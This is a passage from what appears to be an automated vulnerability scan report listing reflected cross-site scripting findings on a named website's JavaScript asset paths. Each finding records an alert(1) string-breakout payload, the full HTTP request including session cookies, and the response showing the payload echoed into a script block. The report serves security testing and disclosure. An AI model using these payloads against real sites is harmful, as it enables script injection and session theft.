The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72931"-alert(1)-"45543eb08c1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/ajaxlib.js72931"-alert(1)-"45543eb08c1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/ajaxlib.js72931"-alert(1)-"45543eb08c1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.36. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4c98"-alert(1)-"3068e25c5c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/ajaxlib.js?d4c98"-alert(1)-"3068e25c5c8=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/ajaxlib.js?d4c98"-alert(1)-"3068e25c5c8=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.37. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fca30"-alert(1)-"22e394819af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesfca30"-alert(1)-"22e394819af/newassets/includes/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesfca30"-alert(1)-"22e394819af/newassets/includes/js/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.38. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a833"-alert(1)-"f1b3a80e89c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets5a833"-alert(1)-"f1b3a80e89c/includes/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets5a833"-alert(1)-"f1b3a80e89c/includes/js/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.39. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be914"-alert(1)-"d7583b93b1f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includesbe914"-alert(1)-"d7583b93b1f/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includesbe914"-alert(1)-"d7583b93b1f/js/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.40. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 254cc"-alert(1)-"7ef9881c0ed was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js254cc"-alert(1)-"7ef9881c0ed/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js254cc"-alert(1)-"7ef9881c0ed/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.41. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aae9e"-alert(1)-"0ee85bcbea6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/show_layer.jsaae9e"-alert(1)-"0ee85bcbea6 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/show_layer.jsaae9e"-alert(1)-"0ee85bcbea6";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.42. http://www.tucows.com/images/newassets/includes/js/show_layer.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b38f6"-alert(1)-"339c2aebf39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/show_layer.js?b38f6"-alert(1)-"339c2aebf39=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/show_layer.js?b38f6"-alert(1)-"339c2aebf39=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.43. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3b50"-alert(1)-"b444dbcbd88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesf3b50"-alert(1)-"b444dbcbd88/newassets/includes/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesf3b50"-alert(1)-"b444dbcbd88/newassets/includes/js/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.44. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d53eb"-alert(1)-"62bf072695 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetsd53eb"-alert(1)-"62bf072695/includes/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetsd53eb"-alert(1)-"62bf072695/includes/js/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.45. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c81a"-alert(1)-"2b1a48bb558 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes3c81a"-alert(1)-"2b1a48bb558/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

